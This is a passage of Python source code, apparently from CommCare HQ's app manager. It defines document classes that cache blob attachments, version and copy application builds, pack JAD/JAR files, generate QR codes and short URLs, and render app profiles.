name={(lang or 'en'): name or ugettext("Untitled Module")},
case_details=DetailPair(
short=Detail(detail.to_json()),
long=Detail(detail.to_json()),
),
)
module.get_or_create_unique_id()
return module
@property
def validator(self):
return ShadowModuleValidator(self)
class LazyBlobDoc(BlobMixin):
"""LazyAttachmentDoc for blob db
Cache blobs in local memory (for this request)
and in django cache (for the next few requests)
and commit to couchdb.
See also `dimagi.utils.couch.lazy_attachment_doc.LazyAttachmentDoc`
Cache strategy:
- on fetch, check in local memory, then cache
- if both are a miss, fetch from couchdb and store in both
- after an attachment is committed to the blob db and the
save save has succeeded, save the attachment in the cache
"""
def __init__(self, *args, **kwargs):
super(LazyBlobDoc, self).__init__(*args, **kwargs)
self._LAZY_ATTACHMENTS = {}
# to cache fetched attachments
# these we do *not* send back down upon save
self._LAZY_ATTACHMENTS_CACHE = {}
@classmethod
def wrap(cls, data):
if "_attachments" in data:
data = data.copy()
attachments = data.pop("_attachments").copy()
if cls._migrating_blobs_from_couch:
# preserve stubs so couch attachments don't get deleted on save
stubs = {}
for name, value in list(attachments.items()):
if isinstance(value, dict) and "stub" in value:
stubs[name] = attachments.pop(name)
if stubs:
data["_attachments"] = stubs
else:
attachments = None
self = super(LazyBlobDoc, cls).wrap(data)
if attachments:
for name, attachment in attachments.items():
if isinstance(attachment, six.text_type):
attachment = attachment.encode('utf-8')
if isinstance(attachment, bytes):
info = {"content": attachment}
else:
raise ValueError("Unknown attachment format: {!r}"
.format(attachment))
self.lazy_put_attachment(name=name, **info)
return self
def __attachment_cache_key(self, name):
return 'lazy_attachment/{id}/{name}'.format(id=self.get_id, name=name)
def __set_cached_attachment(self, name, content, timeout=60*60*24):
cache.set(self.__attachment_cache_key(name), content, timeout=timeout)
self._LAZY_ATTACHMENTS_CACHE[name] = content
def __get_cached_attachment(self, name):
try:
# it has been fetched already during this request
content = self._LAZY_ATTACHMENTS_CACHE[name]
except KeyError:
content = cache.get(self.__attachment_cache_key(name))
if content is not None:
if isinstance(content, six.text_type):
_soft_assert(False, 'cached attachment has type unicode')
content = content.encode('utf-8')
self._LAZY_ATTACHMENTS_CACHE[name] = content
return content
def put_attachment(self, content, name=None, *args, **kw):
cache.delete(self.__attachment_cache_key(name))
self._LAZY_ATTACHMENTS_CACHE.pop(name, None)
return super(LazyBlobDoc, self).put_attachment(content, name, *args, **kw)
def has_attachment(self, name):
return name in self.lazy_list_attachments()
def lazy_put_attachment(self, content, name=None, content_type=None,
content_length=None):
"""
Ensure the attachment is available through lazy_fetch_attachment
and that upon self.save(), the attachments are put to the doc as well
"""
self._LAZY_ATTACHMENTS[name] = {
'content': content,
'content_type': content_type,
'content_length': content_length,
}
def lazy_fetch_attachment(self, name):
# it has been put/lazy-put already during this request
if name in self._LAZY_ATTACHMENTS:
content = self._LAZY_ATTACHMENTS[name]['content']
else:
content = self.__get_cached_attachment(name)
if content is None:
try:
content = self.fetch_attachment(name, return_bytes=True)
except ResourceNotFound as e:
# django cache will pickle this exception for you
# but e.response isn't picklable
if hasattr(e, 'response'):
del e.response
content = e
self.__set_cached_attachment(name, content, timeout=60*5)
raise
else:
self.__set_cached_attachment(name, content)
if isinstance(content, ResourceNotFound):
raise content
return content
def lazy_list_attachments(self):
keys = set()
keys.update(getattr(self, '_LAZY_ATTACHMENTS', None) or {})
keys.update(self.blobs or {})
return keys
def save(self, **params):
def super_save():
super(LazyBlobDoc, self).save(**params)
if self._LAZY_ATTACHMENTS:
with self.atomic_blobs(super_save):
for name, info in self._LAZY_ATTACHMENTS.items():
if not info['content_type']:
info['content_type'] = ';'.join(filter(None, guess_type(name)))
super(LazyBlobDoc, self).put_attachment(name=name, **info)
# super_save() has succeeded by now
for name, info in self._LAZY_ATTACHMENTS.items():
self.__set_cached_attachment(name, info['content'])
self._LAZY_ATTACHMENTS.clear()
else:
super_save()
class VersionedDoc(LazyBlobDoc):
"""
A document that keeps an auto-incrementing version number, knows how to make copies of itself,
delete a copy of itself, and revert back to an earlier copy of itself.
"""
domain = StringProperty()
copy_of = StringProperty()
version = IntegerProperty()
short_url = StringProperty()
short_odk_url = StringProperty()
short_odk_media_url = StringProperty()
_meta_fields = ['_id', '_rev', 'domain', 'copy_of', 'version', 'short_url', 'short_odk_url', 'short_odk_media_url']
@property
def id(self):
return self._id
@property
def master_id(self):
"""Return the ID of the 'master' app. For app builds this is the ID
of the app they were built from otherwise it's just the app's ID."""
return self.copy_of or self._id
def save(self, response_json=None, increment_version=None, **params):
if increment_version is None:
increment_version = not self.copy_of and self.doc_type != 'LinkedApplication'
if increment_version:
self.version = self.version + 1 if self.version else 1
super(VersionedDoc, self).save(**params)
if response_json is not None:
if 'update' not in response_json:
response_json['update'] = {}
response_json['update']['app-version'] = self.version
def make_build(self):
assert self.get_id
assert self.copy_of is None
cls = self.__class__
copies = cls.view('app_manager/applications', key=[self.domain, self._id, self.version], include_docs=True, limit=1).all()
if copies:
copy = copies[0]
else:
copy = deepcopy(self.to_json())
bad_keys = ('_id', '_rev', '_attachments', 'external_blobs',
'short_url', 'short_odk_url', 'short_odk_media_url', 'recipients')
for bad_key in bad_keys:
if bad_key in copy:
del copy[bad_key]
copy = cls.wrap(copy)
copy['copy_of'] = self._id
copy.copy_attachments(self)
return copy
def copy_attachments(self, other, regexp=ATTACHMENT_REGEX):
for name in other.lazy_list_attachments() or {}:
if regexp is None or re.match(regexp, name):
self.lazy_put_attachment(other.lazy_fetch_attachment(name), name)
def make_reversion_to_copy(self, copy):
"""
Replaces couch doc with a copy of the backup ("copy").
Returns the another Application/RemoteApp referring to this
updated couch doc. The returned doc should be used in place of
the original doc, i.e. should be called as follows:
app = app.make_reversion_to_copy(copy)
app.save()
"""
if copy.copy_of != self._id:
raise VersioningError("%s is not a copy of %s" % (copy, self))
app = deepcopy(copy.to_json())
app['_rev'] = self._rev
app['_id'] = self._id
app['version'] = self.version
app['copy_of'] = None
app.pop('_attachments', None)
app.pop('external_blobs', None)
cls = self.__class__
app = cls.wrap(app)
app.copy_attachments(copy)
return app
def delete_copy(self, copy):
if copy.copy_of != self._id:
raise VersioningError("%s is not a copy of %s" % (copy, self))
copy.delete_app()
copy.save(increment_version=False)
def scrub_source(self, source):
"""
To be overridden.
Use this to scrub out anything
that should be shown in the
application source, such as ids, etc.
"""
return source
def export_json(self, dump_json=True):
source = deepcopy(self.to_json())
for field in self._meta_fields:
if field in source:
del source[field]
_attachments = self.get_attachments()
# the '_attachments' value is a dict of `name: blob_content`
# pairs, and is part of the exported (serialized) app interface
source['_attachments'] = _attachments
source.pop("external_blobs", None)
source = self.scrub_source(source)
return json.dumps(source) if dump_json else source
def get_attachments(self):
attachments = {}
for name in self.lazy_list_attachments():
if re.match(ATTACHMENT_REGEX, name):
# FIXME loss of metadata (content type, etc.)
attachments[name] = self.lazy_fetch_attachment(name)
return attachments
def save_attachments(self, attachments, save=None):
with self.atomic_blobs(save=save):
for name, attachment in attachments.items():
if re.match(ATTACHMENT_REGEX, name):
self.put_attachment(attachment, name)
return self
@classmethod
def from_source(cls, source, domain):
for field in cls._meta_fields:
if field in source:
del source[field]
source['domain'] = domain
app = cls.wrap(source)
return app
def is_deleted(self):
return self.doc_type.endswith(DELETED_SUFFIX)
def unretire(self):
self.doc_type = self.get_doc_type()
self.save()
def get_doc_type(self):
if self.doc_type.endswith(DELETED_SUFFIX):
return self.doc_type[:-len(DELETED_SUFFIX)]
else:
return self.doc_type
def absolute_url_property(method):
"""
Helper for the various fully qualified application URLs
Turns a method returning an unqualified URL
into a property returning a fully qualified URL
(e.g., '/my_url/' => 'https://www.commcarehq.org/my_url/')
Expects `self.url_base` to be fully qualified url base
"""
@wraps(method)
def _inner(self):
return "%s%s" % (self.url_base, method(self))
return property(_inner)
class BuildProfile(DocumentSchema):
name = StringProperty()
langs = StringListProperty()
practice_mobile_worker_id = StringProperty()
def __eq__(self, other):
return self.langs == other.langs and self.practice_mobile_worker_id == other.practice_mobile_worker_id
def __ne__(self, other):
return not self.__eq__(other)
class ApplicationBase(VersionedDoc, SnapshotMixin,
CommCareFeatureSupportMixin,
CommentMixin):
"""
Abstract base class for Application and RemoteApp.
Contains methods for generating the various files and zipping them into CommCare.jar
See note at top of file for high-level overview.
"""
_blobdb_type_code = CODES.application
recipients = StringProperty(default="")
# this is the supported way of specifying which commcare build to use
build_spec = SchemaProperty(BuildSpec)
platform = StringProperty(
choices=["nokia/s40", "nokia/s60", "winmo", "generic"],
default="nokia/s40"
)
text_input = StringProperty(
choices=['roman', 'native', 'custom-keys', 'qwerty'],
default="roman"
)
# The following properties should only appear on saved builds
# built_with stores a record of CommCare build used in a saved app
built_with = SchemaProperty(BuildRecord)
build_signed = BooleanProperty(default=True)
built_on = DateTimeProperty(required=False)
build_comment = StringProperty()
comment_from = StringProperty()
build_broken = BooleanProperty(default=False)
is_auto_generated = BooleanProperty(default=False)
# not used yet, but nice for tagging/debugging
# currently only canonical value is 'incomplete-build',
# for when build resources aren't found where they should be
build_broken_reason = StringProperty()
# watch out for a past bug:
# when reverting to a build that happens to be released
# that got copied into into the new app doc, and when new releases were made,
# they were automatically starred
# AFAIK this is fixed in code, but my rear its ugly head in an as-yet-not-understood
# way for apps that already had this problem. Just keep an eye out
is_released = BooleanProperty(default=False)
# django-style salted hash of the admin password
admin_password = StringProperty()
# a=Alphanumeric, n=Numeric, x=Neither (not allowed)
admin_password_charset = StringProperty(choices=['a', 'n', 'x'], default='n')
langs = StringListProperty()
secure_submissions = BooleanProperty(default=False)
# metadata for data platform
amplifies_workers = StringProperty(
choices=[AMPLIFIES_YES, AMPLIFIES_NO, AMPLIFIES_NOT_SET],
default=AMPLIFIES_NOT_SET
)
amplifies_project = StringProperty(
choices=[AMPLIFIES_YES, AMPLIFIES_NO, AMPLIFIES_NOT_SET],
default=AMPLIFIES_NOT_SET
)
minimum_use_threshold = StringProperty(
default='15'
)
experienced_threshold = StringProperty(
default='3'
)
# exchange properties
cached_properties = DictProperty()
description = StringProperty()
deployment_date = DateTimeProperty()
phone_model = StringProperty()
user_type = StringProperty()
attribution_notes = StringProperty()
# always false for RemoteApp
case_sharing = BooleanProperty(default=False)
vellum_case_management = BooleanProperty(default=True)
# legacy property; kept around to be able to identify (deprecated) v1 apps
application_version = StringProperty(default=APP_V2, choices=[APP_V1, APP_V2], required=False)
last_modified = DateTimeProperty()
def assert_app_v2(self):
assert self.application_version == APP_V2
build_profiles = SchemaDictProperty(BuildProfile)
practice_mobile_worker_id = StringProperty()
use_j2me_endpoint = BooleanProperty(default=False)
target_commcare_flavor = StringProperty(
default='none',
choices=['none', TARGET_COMMCARE, TARGET_COMMCARE_LTS]
)
# Whether or not the Application has had any forms submitted against it
has_submissions = BooleanProperty(default=False)
# domains that are allowed to have linked apps with this master
linked_whitelist = StringListProperty()
mobile_ucr_restore_version = StringProperty(
default=MOBILE_UCR_VERSION_1, choices=MOBILE_UCR_VERSIONS, required=False
)
location_fixture_restore = StringProperty(
default=DEFAULT_LOCATION_FIXTURE_OPTION, choices=LOCATION_FIXTURE_OPTIONS,
required=False
)
@staticmethod
def _scrap_old_conventions(data):
should_save = False
# scrape for old conventions and get rid of them
if 'commcare_build' in data:
version, build_number = data['commcare_build'].split('/')
data['build_spec'] = BuildSpec.from_string("%s/latest" % version).to_json()
del data['commcare_build']
if 'commcare_tag' in data:
version, build_number = current_builds.TAG_MAP[data['commcare_tag']]
data['build_spec'] = BuildSpec.from_string("%s/latest" % version).to_json()
del data['commcare_tag']
if "built_with" in data and isinstance(data['built_with'], six.string_types):
soft_assert_type_text(data['built_with'])
data['built_with'] = BuildSpec.from_string(data['built_with']).to_json()
if 'native_input' in data:
if 'text_input' not in data:
data['text_input'] = 'native' if data['native_input'] else 'roman'
del data['native_input']
if 'build_langs' in data:
if data['build_langs'] != data['langs'] and 'build_profiles' not in data:
data['build_profiles'] = {
uuid.uuid4().hex: dict(
name=', '.join(data['build_langs']),
langs=data['build_langs']
)
}
should_save = True
del data['build_langs']
if 'original_doc' in data:
data['copy_history'] = [data.pop('original_doc')]
should_save = True
return should_save
@classmethod
def wrap(cls, data, scrap_old_conventions=True):
if scrap_old_conventions:
should_save = cls._scrap_old_conventions(data)
data["description"] = data.get('description') or data.get('short_description')
self = super(ApplicationBase, cls).wrap(data)
if not self.build_spec or self.build_spec.is_null():
self.build_spec = get_default_build_spec()
if scrap_old_conventions and should_save:
self.save()
return self
@property
@memoized
def global_app_config(self):
return GlobalAppConfig.for_app(self)
def rename_lang(self, old_lang, new_lang):
validate_lang(new_lang)
def is_remote_app(self):
return False
@memoized
def get_previous_version(self):
return self.view('app_manager/applications',
startkey=[self.domain, self.master_id, {}],
endkey=[self.domain, self.master_id],
include_docs=True,
limit=1,
descending=True,
).first()
@memoized
def get_latest_saved(self):
"""
This looks really similar to get_latest_app, not sure why tim added
"""
doc = (get_latest_released_app_doc(self.domain, self._id) or
get_latest_build_doc(self.domain, self._id))
return self.__class__.wrap(doc) if doc else None
def set_admin_password(self, raw_password):
salt = os.urandom(5).encode('hex')
self.admin_password = make_password(raw_password, salt=salt)
if raw_password.isnumeric():
self.admin_password_charset = 'n'
elif raw_password.isalnum():
self.admin_password_charset = 'a'
else:
self.admin_password_charset = 'x'
def get_build(self):
return self.build_spec.get_build()
@property
def build_version(self):
# `LooseVersion`s are smart!
# LooseVersion('2.12.0') > '2.2'
# (even though '2.12.0' < '2.2')
if self.build_spec.version:
return LooseVersion(self.build_spec.version)
@property
def commcare_minor_release(self):
"""This is mostly just for views"""
return '%d.%d' % self.build_spec.minor_release()
@property
def short_name(self):
return self.name if len(self.name) <= 12 else '%s..' % self.name[:10]
@property
def url_base(self):
custom_base_url = getattr(self, 'custom_base_url', None)
return custom_base_url or get_url_base()
@absolute_url_property
def post_url(self):
if self.secure_submissions:
url_name = 'receiver_secure_post_with_app_id'
else:
url_name = 'receiver_post_with_app_id'
return reverse(url_name, args=[self.domain, self.get_id])
@absolute_url_property
def key_server_url(self):
return reverse('key_server_url', args=[self.domain])
@absolute_url_property
def heartbeat_url(self):
return reverse('phone_heartbeat', args=[self.domain, self.get_id])
@absolute_url_property
def ota_restore_url(self):
return reverse('app_aware_restore', args=[self.domain, self._id])
@absolute_url_property
def form_record_url(self):
return '/a/%s/api/custom/pact_formdata/v1/' % self.domain
@absolute_url_property
def hq_profile_url(self):
# RemoteApp already has a property called "profile_url",
# Application.profile_url just points here to stop the conflict
# http://manage.dimagi.com/default.asp?227088#1149422
return "%s?latest=true" % (
reverse('download_profile', args=[self.domain, self._id])
)
@absolute_url_property
def media_profile_url(self):
return "%s?latest=true" % (
reverse('download_media_profile', args=[self.domain, self._id])
)
@property
def profile_loc(self):
return "jr://resource/profile.xml"
@absolute_url_property
def jar_url(self):
return reverse('download_jar', args=[self.domain, self._id])
@absolute_url_property
def recovery_measures_url(self):
return reverse('recovery_measures', args=[self.domain, self._id])
def get_jar_path(self):
spec = {
'nokia/s40': 'Nokia/S40',
'nokia/s60': 'Nokia/S60',
'generic': 'Generic/Default',
'winmo': 'Native/WinMo'
}[self.platform]
if self.platform in ('nokia/s40', 'nokia/s60'):
spec += {
('native',): '-native-input',
('roman',): '-generic',
('custom-keys',): '-custom-keys',
('qwerty',): '-qwerty'
}[(self.text_input,)]
return spec
def get_jadjar(self):
return self.get_build().get_jadjar(self.get_jar_path(), self.use_j2me_endpoint)
def validate_jar_path(self):
build = self.get_build()
setting = commcare_settings.get_commcare_settings_lookup()['hq']['text_input']
value = self.text_input
setting_version = setting['since'].get(value)
if setting_version:
setting_version = tuple(map(int, setting_version.split('.')))
my_version = build.minor_release()
if my_version < setting_version:
i = setting['values'].index(value)
assert i != -1
name = _(setting['value_names'][i])
raise AppEditingError((
'%s Text Input is not supported '
'in CommCare versions before %s.%s. '
'(You are using %s.%s)'
) % ((name,) + setting_version + my_version))
@property
def jad_settings(self):
settings = {
'JavaRosa-Admin-Password': self.admin_password,
'Profile': self.profile_loc,
'MIDlet-Jar-URL': self.jar_url,
#'MIDlet-Name': self.name,
# e.g. 2011-Apr-11 20:45
'CommCare-Release': "true",
}
if not self.build_version or self.build_version < LooseVersion('2.8'):
settings['Build-Number'] = self.version
return settings
def create_build_files(self, build_profile_id=None):
all_files = self.create_all_files(build_profile_id)
for filepath in all_files:
self.lazy_put_attachment(all_files[filepath],
'files/%s' % filepath)
def create_jadjar_from_build_files(self, save=False):
self.validate_jar_path()
with CriticalSection(['create_jadjar_' + self._id]):
try:
return (
self.lazy_fetch_attachment('CommCare.jad'),
self.lazy_fetch_attachment('CommCare.jar'),
)
except (ResourceNotFound, KeyError):
all_files = {
filename[len('files/'):]: self.lazy_fetch_attachment(filename)
for filename in self.blobs if filename.startswith('files/')
}
all_files = {
name: (contents if isinstance(contents, (bytes, SafeBytes)) else contents.encode('utf-8'))
for name, contents in all_files.items()
}
release_date = self.built_with.datetime or datetime.datetime.utcnow()
jad_settings = {
'Released-on': release_date.strftime("%Y-%b-%d %H:%M"),
}
jad_settings.update(self.jad_settings)
jadjar = self.get_jadjar().pack(all_files, jad_settings)
if save:
self.lazy_put_attachment(jadjar.jad, 'CommCare.jad')
self.lazy_put_attachment(jadjar.jar, 'CommCare.jar')
self.built_with.signed = jadjar.signed
return jadjar.jad, jadjar.jar
@property
@memoized
def timing_context(self):
return TimingContext(self.name)
def validate_app(self):
return ApplicationBaseValidator(self).validate_app()
@absolute_url_property
def odk_profile_url(self):
return reverse('download_odk_profile', args=[self.domain, self._id])
@absolute_url_property
def odk_media_profile_url(self):
return reverse('download_odk_media_profile', args=[self.domain, self._id])
def get_odk_qr_code(self, with_media=False, build_profile_id=None, download_target_version=False):
"""Returns a QR code, as a PNG to install on CC-ODK"""
filename = 'qrcode.png' if not download_target_version else 'qrcode-targeted.png'
try:
return self.lazy_fetch_attachment(filename)
except ResourceNotFound:
url = self.odk_profile_url if not with_media else self.odk_media_profile_url
kwargs = []
if build_profile_id is not None:
kwargs.append('profile={profile_id}'.format(profile_id=build_profile_id))
if download_target_version:
kwargs.append('download_target_version=true')
url += '?' + '&'.join(kwargs)
image = qrcode.make(url)
output = BytesIO()
image.save(output, "PNG")
qr_content = output.getvalue()
self.lazy_put_attachment(qr_content, filename,
content_type="image/png")
return qr_content
def generate_shortened_url(self, view_name, build_profile_id=None):
try:
if settings.BITLY_LOGIN:
if build_profile_id is not None:
long_url = "{}{}?profile={}".format(
self.url_base, reverse(view_name, args=[self.domain, self._id]), build_profile_id
)
else:
long_url = "{}{}".format(self.url_base, reverse(view_name, args=[self.domain, self._id]))
shortened_url = bitly.shorten(long_url)
else:
shortened_url = None
except Exception:
logging.exception("Problem creating bitly url for app %s. Do you have network?" % self.get_id)
else:
return shortened_url
def get_short_url(self, build_profile_id=None):
if not build_profile_id:
if not self.short_url:
self.short_url = self.generate_shortened_url('download_jad')
self.save()
return self.short_url
else:
return self.generate_shortened_url('download_jad', build_profile_id)
def get_short_odk_url(self, with_media=False, build_profile_id=None):
if not build_profile_id:
if with_media:
if not self.short_odk_media_url:
self.short_odk_media_url = self.generate_shortened_url('download_odk_media_profile')
self.save()
return self.short_odk_media_url
else:
if not self.short_odk_url:
self.short_odk_url = self.generate_shortened_url('download_odk_profile')
self.save()
return self.short_odk_url
else:
if with_media:
return self.generate_shortened_url('download_odk_media_profile', build_profile_id)
else:
return self.generate_shortened_url('download_odk_profile', build_profile_id)
def fetch_jar(self):
return self.get_jadjar().fetch_jar()
@time_method()
def make_build(self, comment=None, user_id=None):
copy = super(ApplicationBase, self).make_build()
if not copy._id:
# I expect this always to be the case
# but check explicitly so as not to change the _id if it exists
copy._id = uuid.uuid4().hex
copy.create_build_files()
# since this hard to put in a test
# I'm putting this assert here if copy._id is ever None
# which makes tests error
assert copy._id
built_on = datetime.datetime.utcnow()
copy.date_created = built_on
copy.built_on = built_on
copy.built_with = BuildRecord(
version=copy.build_spec.version,
build_number=copy.version,
datetime=built_on,
)
copy.build_comment = comment
copy.comment_from = user_id
copy.is_released = False
prune_auto_generated_builds.delay(self.domain, self._id)
return copy
def delete_app(self):
domain_has_apps.clear(self.domain)
self.doc_type += '-Deleted'
record = DeleteApplicationRecord(
domain=self.domain,
app_id=self.id,
datetime=datetime.datetime.utcnow()
)
record.save()
return record
def save(self, response_json=None, increment_version=None, **params):
from corehq.apps.analytics.tasks import track_workflow, send_hubspot_form, HUBSPOT_SAVED_APP_FORM_ID
self.last_modified = datetime.datetime.utcnow()
if not self._rev and not domain_has_apps(self.domain):
domain_has_apps.clear(self.domain)
LatestAppInfo(self.master_id, self.domain).clear_caches()
get_all_case_properties.clear(self)
get_usercase_properties.clear(self)
request = view_utils.get_request()
user = getattr(request, 'couch_user', None)
if user and user.days_since_created == 0:
track_workflow(user.get_email(), 'Saved the App Builder within first 24 hours')
send_hubspot_form(HUBSPOT_SAVED_APP_FORM_ID, request)
super(ApplicationBase, self).save(
response_json=response_json, increment_version=increment_version, **params)
@classmethod
def save_docs(cls, docs, **kwargs):
utcnow = datetime.datetime.utcnow()
for doc in docs:
doc['last_modified'] = utcnow
super(ApplicationBase, cls).save_docs(docs, **kwargs)
bulk_save = save_docs
def set_form_versions(self):
# by default doing nothing here is fine.
pass
def set_media_versions(self):
pass
def get_build_langs(self, build_profile_id=None):
if build_profile_id is not None:
return self.build_profiles[build_profile_id].langs
else:
return self.langs
def validate_lang(lang):
if not re.match(r'^[a-z]{2,3}(-[a-z]*)?$', lang):
raise ValueError("Invalid Language")
class SavedAppBuild(ApplicationBase):
def releases_list_json(self, timezone):
"""
returns minimum possible data that could be used to list a Build on releases page on HQ
:param timezone: timezone expected for timestamps in result
:return: data dict
"""
data = super(SavedAppBuild, self).to_json().copy()
# ignore details that are not used
for key in ('modules', 'user_registration', 'external_blobs',
'_attachments', 'profile', 'translations',
'description', 'short_description', 'multimedia_map', 'media_language_map'):
data.pop(key, None)
built_on_user_time = ServerTime(self.built_on).user_time(timezone)
data.update({
'id': self.id,
'built_on_date': built_on_user_time.ui_string(USER_DATE_FORMAT),
'built_on_time': built_on_user_time.ui_string(USER_TIME_FORMAT),
'menu_item_label': self.built_with.get_menu_item_label(),
'jar_path': self.get_jar_path(),
'short_name': self.short_name,
'enable_offline_install': self.enable_offline_install,
})
comment_from = data['comment_from']
if comment_from:
data['comment_user_name'] = get_display_name_for_user_id(
self.domain, comment_from, default=comment_from)
return data
class Application(ApplicationBase, TranslationMixin, ApplicationMediaMixin,
ApplicationIntegrationMixin):
"""
An Application that can be created entirely through the online interface
"""
modules = SchemaListProperty(ModuleBase)
name = StringProperty()
# profile's schema is {'features': {}, 'properties': {}, 'custom_properties': {}}
# ended up not using a schema because properties is a reserved word
profile = DictProperty()
use_custom_suite = BooleanProperty(default=False)
custom_base_url = StringProperty()
cloudcare_enabled = BooleanProperty(default=False)
translation_strategy = StringProperty(default='select-known',
choices=list(app_strings.CHOICES.keys()))
auto_gps_capture = BooleanProperty(default=False)
date_created = DateTimeProperty()
created_from_template = StringProperty()
use_grid_menus = BooleanProperty(default=False)
grid_form_menus = StringProperty(default='none',
choices=['none', 'all', 'some'])
add_ons = DictProperty()
smart_lang_display = BooleanProperty() # null means none set so don't default to false/true
def has_modules(self):
return len(self.modules) > 0 and not self.is_remote_app()
@property
@memoized
def commtrack_enabled(self):
if settings.UNIT_TESTING:
return False # override with .tests.util.commtrack_enabled
domain_obj = Domain.get_by_name(self.domain) if self.domain else None
return domain_obj.commtrack_enabled if domain_obj else False
@classmethod
def wrap(cls, data):
data.pop('commtrack_enabled', None) # Remove me after migrating apps
data['modules'] = [module for module in data.get('modules', [])
if module.get('doc_type') != 'CareplanModule']
self = super(Application, cls).wrap(data)
# make sure all form versions are None on working copies
if not self.copy_of:
for form in self.get_forms():
form.version = None
# weird edge case where multimedia_map gets set to null and causes issues
if self.multimedia_map is None:
self.multimedia_map = {}
return self
def save(self, *args, **kwargs):
super(Application, self).save(*args, **kwargs)
# Import loop if this is imported at the top
# TODO: revamp so signal_connections <- models <- signals
from corehq.apps.app_manager import signals
from couchforms.analytics import get_form_analytics_metadata
for xmlns in self.get_xmlns_map():
get_form_analytics_metadata.clear(self.domain, self._id, xmlns)
signals.app_post_save.send(Application, application=self)
def make_reversion_to_copy(self, copy):
app = super(Application, self).make_reversion_to_copy(copy)
for form in app.get_forms():
# reset the form's validation cache, since the form content is
# likely to have changed in the revert!
form.clear_validation_cache()
form.version = None
app.build_broken = False
return app
@property
def profile_url(self):
return self.hq_profile_url
@absolute_url_property
def suite_url(self):
return reverse('download_suite', args=[self.domain, self.get_id])
@property
def suite_loc(self):
if self.enable_relative_suite_path:
return './suite.xml'
else:
return "jr://resource/suite.xml"
@absolute_url_property
def media_suite_url(self):
return reverse('download_media_suite', args=[self.domain, self.get_id])
@property
def media_suite_loc(self):
if self.enable_relative_suite_path:
return "./media_suite.xml"
else:
return "jr://resource/media_suite.xml"
@property
def default_language(self):
return self.langs[0] if len(self.langs) > 0 else "en"
def fetch_xform(self, module_id=None, form_id=None, form=None, build_profile_id=None):
if not form:
form = self.get_module(module_id).get_form(form_id)
return form.validate_form().render_xform(build_profile_id)
def set_form_versions(self):
"""
Set the 'version' property on each form as follows to the current app version if the form is new
or has changed since the last build. Otherwise set it to the version from the last build.
"""
def _hash(val):
return hashlib.md5(val).hexdigest()
previous_version = self.get_previous_version()
if previous_version:
force_new_version = self.build_profiles != previous_version.build_profiles
for form_stuff in self.get_forms(bare=False):
filename = 'files/%s' % self.get_form_filename(**form_stuff)
form = form_stuff["form"]
if not force_new_version:
try:
previous_form = previous_version.get_form(form.unique_id)
# take the previous version's compiled form as-is
# (generation code may have changed since last build)
previous_source = previous_version.fetch_attachment(filename, return_bytes=True)
except (ResourceNotFound, FormNotFoundException):
form.version = None
else:
previous_hash = _hash(previous_source)
# hack - temporarily set my version to the previous version
# so that that's not treated as the diff
previous_form_version = previous_form.get_version()
form.version = previous_form_version
my_hash = _hash(self.fetch_xform(form=form))
if previous_hash != my_hash:
form.version = None
else:
form.version = None
def set_media_versions(self):
"""
Set the media version numbers for all media in the app to the current app version
if the media is new or has changed since the last build. Otherwise set it to the
version from the last build.
"""
# access to .multimedia_map is slow
previous_version = self.get_previous_version()
prev_multimedia_map = previous_version.multimedia_map if previous_version else {}
for path, map_item in six.iteritems(self.multimedia_map):
prev_map_item = prev_multimedia_map.get(path, None)
if prev_map_item and prev_map_item.unique_id:
# Re-use the id so CommCare knows it's the same resource
map_item.unique_id = prev_map_item.unique_id
if (prev_map_item and prev_map_item.version
and prev_map_item.multimedia_id == map_item.multimedia_id):
map_item.version = prev_map_item.version
else:
map_item.version = self.version
def ensure_module_unique_ids(self, should_save=False):
"""
Creates unique_ids for modules that don't have unique_id attributes
should_save: the doc will be saved only if should_save is set to True
WARNING: If called on the same doc in different requests without saving,
this function will set different uuid each time,
likely causing unexpected behavior
"""
if any(not mod.unique_id for mod in self.modules):
for mod in self.modules:
mod.get_or_create_unique_id()
if should_save:
self.save()
def create_app_strings(self, lang, build_profile_id=None):
gen = app_strings.CHOICES[self.translation_strategy]
if lang == 'default':
return gen.create_default_app_strings(self, build_profile_id)
else:
return gen.create_app_strings(self, lang)
@property
def skip_validation(self):
properties = (self.profile or {}).get('properties', {})
return properties.get('cc-content-valid', 'yes')
@property
def jad_settings(self):
s = super(Application, self).jad_settings
s.update({
'Skip-Validation': self.skip_validation,
})
return s
@time_method()
def create_profile(self, is_odk=False, with_media=False,
template='app_manager/profile.xml', build_profile_id=None, target_commcare_flavor=None):
self__profile = self.profile
app_profile = defaultdict(dict)
for setting in commcare_settings.get_custom_commcare_settings():
setting_type = setting['type']
setting_id = setting['id']
if setting_type not in ('properties', 'features'):
setting_value = None
elif setting_id not in self__profile.get(setting_type, {}):
if 'commcare_default' in setting and setting['commcare_default'] != setting['default']:
setting_value = setting['default']
else:
setting_value = None
else:
setting_value = self__profile[setting_type][setting_id]
if setting_value:
app_profile[setting_type][setting_id] = {
'value': setting_value,
'force': setting.get('force', False)
}
# assert that it gets explicitly set once per loop
del setting_value
if self.case_sharing:
app_profile['properties']['server-tether'] = {
'force': True,
'value': 'sync',
}
logo_refs = [logo_name for logo_name in self.logo_refs if logo_name in ANDROID_LOGO_PROPERTY_MAPPING]
if logo_refs and domain_has_privilege(self.domain, privileges.COMMCARE_LOGO_UPLOADER):
for logo_name in logo_refs:
app_profile['properties'][ANDROID_LOGO_PROPERTY_MAPPING[logo_name]] = {
'force': True,
'value': self.logo_refs[logo_name]['path'],
}
if toggles.MOBILE_RECOVERY_MEASURES.enabled(self.domain):
app_profile['properties']['recovery-measures-url'] = {
'force': True,
'value': self.recovery_measures_url,
}
if with_media:
profile_url = self.media_profile_url if not is_odk else (self.odk_media_profile_url + '?latest=true')
else:
profile_url = self.profile_url if not is_odk else (self.odk_profile_url + '?latest=true')
if toggles.CUSTOM_PROPERTIES.enabled(self.domain) and "custom_properties" in self__profile:
app_profile['custom_properties'].update(self__profile['custom_properties'])
apk_heartbeat_url = self.heartbeat_url
locale = self.get_build_langs(build_profile_id)[0]
target_package_id = {
TARGET_COMMCARE: 'org.commcare.dalvik',
TARGET_COMMCARE_LTS: 'org.commcare.lts',
}.get(target_commcare_flavor)
return render_to_string(template, {
'is_odk': is_odk,
'app': self,
'profile_url': profile_url,
'app_profile': app_profile,
'cc_user_domain': cc_user_domain(self.domain),
'include_media_suite': with_media,
'uniqueid': self.master_id,
'name': self.name,
'descriptor': "Profile File",
'build_profile_id': build_profile_id,
'locale': locale,
'apk_heartbeat_url': apk_heartbeat_url,
'target_package_id': target_package_id,
}).encode('utf-8')
@property
def custom_suite(self):
try:
return self.lazy_fetch_attachment('custom_suite.xml')
except ResourceNotFound:
return ""
def set_custom_suite(self, value):
